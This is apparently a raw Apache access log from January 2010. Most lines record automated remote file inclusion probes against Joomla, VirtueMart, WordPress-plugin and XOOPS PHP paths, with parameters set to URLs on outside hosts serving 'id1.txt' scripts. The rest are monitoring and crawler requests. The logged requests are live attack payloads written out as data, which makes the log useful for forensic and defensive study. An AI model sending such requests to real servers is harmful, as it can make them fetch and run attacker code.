67.227.82.174 - - [05/Jan/2010:01:08:58 -0500] "GET /logs/access_log.Q109061200%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:09:02 -0500] "GET /logs/error_log.Q109100500%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:09:02 -0500] "GET /logs/access_log.Q109081000%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:01:09:26 -0500] "GET /logs/access_log.Q109122200//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:01:09:26 -0500] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:01:09:32 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.227.82.174 - - [05/Jan/2010:01:09:40 -0500] "GET /logs/error_log.Q109102800//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.227.82.174 - - [05/Jan/2010:01:09:40 -0500] "GET /logs/access_log.Q109082500//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.hyonsvc.co.kr//bbs//upload/id1.txt??? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
207.58.188.177 - - [05/Jan/2010:01:11:25 -0500] "GET /logs/access_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:25 -0500] "GET /logs/access_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:25 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:26 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:26 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:28 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:34 -0500] "GET /logs/access_log.Q109061100/xmlrpc.php? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:34 -0500] "GET /xmlrpc.php? HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:11:34 -0500] "GET /logs/xmlrpc.php? HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
12.10.157.18 - - [05/Jan/2010:01:11:44 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.820"
89.184.72.4 - - [05/Jan/2010:01:11:47 -0500] "GET /logs/access_log.Q109090400//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:12:28 -0500] "GET //?path%5Bdocroot%5D=http://via.wen.ru/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:12:28 -0500] "GET /logs/access_log.Q109112900%20%20//?path%5Bdocroot%5D=http://via.wen.ru/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:12:28 -0500] "GET /logs//?path%5Bdocroot%5D=http://via.wen.ru/id1.txt? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:45 -0500] "GET /logs/error_log.Q109121400%20%20/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:45 -0500] "GET /logs/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:45 -0500] "GET /logs/error_log.Q109120500%20%20/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:45 -0500] "GET /index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:46 -0500] "GET /logs/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:46 -0500] "GET /logs/error_log.Q109120500%20%20/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:46 -0500] "GET /index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:46 -0500] "GET /logs/error_log.Q109121400%20%20/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/error_log.Q109120500/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/error_log.Q109121400/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/error_log.Q109121400/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:12:51 -0500] "GET /logs/error_log.Q109120500/index.php?visualizar=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:01:13:14 -0500] "GET /logs/error_log.Q109073000 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
61.47.7.71 - - [05/Jan/2010:01:13:42 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:13:42 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:01:13:46 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:01:13:46 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:01:13:46 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:01:13:47 -0500] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:01:13:47 -0500] "GET /logs/access_log.Q109112200//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:01:13:47 -0500] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:13:50 -0500] "GET /logs/access_log.Q109122200%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:13:50 -0500] "GET /logs/access_log.Q109081000%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:13:53 -0500] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:13:53 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:13:53 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:01:14:06 -0500] "GET /logs/access_log.Q109121000//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.157.111 - - [05/Jan/2010:01:14:12 -0500] "GET /logs/access_log.Q109121000//components/com_simpleboard/image_upload.php?sbp=http://www.studio-n.su/tmp/index1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:01:14:32 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.88.18.101 - - [05/Jan/2010:01:14:46 -0500] "GET /logs/access_log.Q109102700//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.88.18.101 - - [05/Jan/2010:01:14:46 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.88.18.101 - - [05/Jan/2010:01:14:46 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:14:46 -0500] "GET /logs/access_log.Q109122200//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:14:58 -0500] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.88.18.101 - - [05/Jan/2010:01:15:08 -0500] "GET /logs/access_log.Q109093000//skin/zero_vote/ask_password.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:31 -0500] "GET /logs/access_log.Q109112900%20%20//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:31 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:31 -0500] "GET //?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:47 -0500] "GET /logs/access_log.Q109112900%20%20//?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
78.110.50.121 - - [05/Jan/2010:01:15:47 -0500] "GET //?path%5Bdocroot%5D=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:16:08 -0500] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:16:08 -0500] "GET /logs/access_log.Q109122200%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:16:08 -0500] "GET //com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:16:12 -0500] "GET /logs/access_log.Q109081000%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.132.185.99 - - [05/Jan/2010:01:15:36 -0500] "GET /images/ACE_Fall04_BestBuys.pdf HTTP/1.0" 200 5886198 "-" "Wget/1.10.2"
210.205.6.233 - - [05/Jan/2010:01:16:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:01:16:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:01:16:55 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:01:16:59 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:01:16:59 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
210.205.6.233 - - [05/Jan/2010:01:16:59 -0500] "GET /logs/access_log.Q109091700//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://avrovulcan.com/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:04 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:04 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:06 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:08 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:09 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:09 -0500] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:01:17:10 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://selatan.fileave.com/id1.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:17:36 -0500] "GET /logs/access_log.Q109122200//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:18:00 -0500] "GET /logs/access_log.Q109052600//com_joomlaflashfun/admin.joomlaflashfun.php?=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.58.188.177 - - [05/Jan/2010:01:18:36 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:18:38 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
207.58.188.177 - - [05/Jan/2010:01:18:38 -0500] "GET /logs/error_log.Q109090300/xmlrpc.php? HTTP/1.1" 404 234 "-" "libwww-perl/5.831"
61.47.7.71 - - [05/Jan/2010:01:19:15 -0500] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:19:15 -0500] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:19:15 -0500] "GET /logs/access_log.Q109112200%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:19:21 -0500] "GET /logs/access_log.Q109112200%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:19:21 -0500] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:19:21 -0500] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:01:19:37 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.47.7.71 - - [05/Jan/2010:01:20:35 -0500] "GET /logs/access_log.Q109112200//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:01:21:01 -0500] "GET /images/ACE_tutor_1Stage_Ridge.pdf HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.19.194.26 - - [05/Jan/2010:01:21:44 -0500] "GET /index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:44 -0500] "GET /logs/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:44 -0500] "GET /logs/access_log.Q109081300%20%20/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:45 -0500] "GET /logs/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:45 -0500] "GET /index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:45 -0500] "GET /logs/access_log.Q109081300%20%20/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:46 -0500] "GET /logs/access_log.Q109051100%20%20/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:01:21:46 -0500] "GET /logs/access_log.Q109051100%20%20/index.php?lg=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:22:08 -0500] "GET /logs/access_log.Q109112200//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:01:24:04 -0500] "GET /images/Office%20Supply/next_white.gif HTTP/1.1" 200 240 "-" "Googlebot-Image/1.0"
209.59.12.99 - - [05/Jan/2010:01:24:32 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.124.120.47 - - [05/Jan/2010:01:26:23 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:23 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:28 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:28 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:28 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:28 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:31 -0500] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:31 -0500] "GET /logs/access_log.Q109091700%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
94.124.120.47 - - [05/Jan/2010:01:26:31 -0500] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:30 -0500] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:30 -0500] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:30 -0500] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:38 -0500] "GET /logs/access_log.Q109081000/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:59 -0500] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:27:59 -0500] "GET /logs/access_log.Q109081000/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:28:02 -0500] "GET /logs/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
61.47.7.71 - - [05/Jan/2010:01:28:02 -0500] "GET /logs/access_log.Q109051500/modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:01:28:49 -0500] "GET /logs/access_log.Q109110700 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.59.12.99 - - [05/Jan/2010:01:29:36 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.143.249 - - [05/Jan/2010:01:30:06 -0500] "GET /logs/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:06 -0500] "GET /xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:06 -0500] "GET /logs/access_log.Q109110300/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:07 -0500] "GET /logs/access_log.Q109110300%20%20/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:07 -0500] "GET /logs/xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
72.55.143.249 - - [05/Jan/2010:01:30:07 -0500] "GET /xGB.php?act=admin&do=http://via.wen.ru/id1.txt? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
